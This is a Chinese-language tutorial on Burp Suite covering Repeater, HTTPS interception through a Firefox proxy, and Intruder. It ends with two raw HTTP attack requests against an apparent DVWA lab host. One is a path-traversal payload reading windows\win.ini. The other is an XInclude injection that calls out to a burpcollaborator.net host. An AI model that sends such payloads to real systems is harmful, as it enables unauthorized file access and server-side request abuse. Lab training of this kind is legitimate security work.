一、使用Burpsuite进行攻击:
1、第一步打开burpsuite:
2、第二部点击Repeater:
3、第三步点击粉笔形状的按钮:
4、输入要攻击目标的ip地址与端口号
5、添加攻击报文,进行攻击
6、查看响应结果
完整界面展示如下
注意:
添加攻击报文时:
1、一定不要修改别人的报文,否则会出错!
2、请求头与请求体之间要空两格,否则会导致报文发不出去。
末尾在给大家附上两攻击报文:
Get:攻击报文:
GET /vulnerabilities..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.198.133/vulnerabilities/sqli/
Connection: close
Cookie: security=low; seraph.confluence=491521%3A7444b08c55ff568a84291b33f340b906edb86593; PHPSESSID=3rjgm7uiqi0qi2rrocfg6k5m11; security=low
Upgrade-Insecure-Requests: 1
post:攻击报文:
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.198.133/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Connection: close
Cookie: seraph.confluence=491521%3A7444b08c55ff568a84291b33f340b906edb86593; PHPSESSID=3rjgm7uiqi0qi2rrocfg6k5m11; security=low
Upgrade-Insecure-Requests: 1
txtName=%3cihc%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2fpe760gj443bccsu5t0qhzp801r7tvjjk7cu2ir.burpcollaborator.net%2ffoo%22%2f%3e%3c%2fihc%3e&mtxMessage=dasdsa&btnSign=Sign+Guestbook
二、使用BurpSuite拦截HTTPS请求:
网站:https://www.cnblogs.com/lsdb/p/6824416.html
以:FireFox为例:
1、第一步打开工具栏:
2、点击选项:
3、点击常规:
4、找到--网络设置--点击设置:
5、手动代理配置--配置--确定
6、访问:访问http://burp/
7、下载证书
三、burp suite拦截对应请求包并发送intruder
网站:https://jingyan.baidu.com/article/17bd8e522d778185ab2bb8fe.html
四、BrupSuite只拦截特定网站的数据包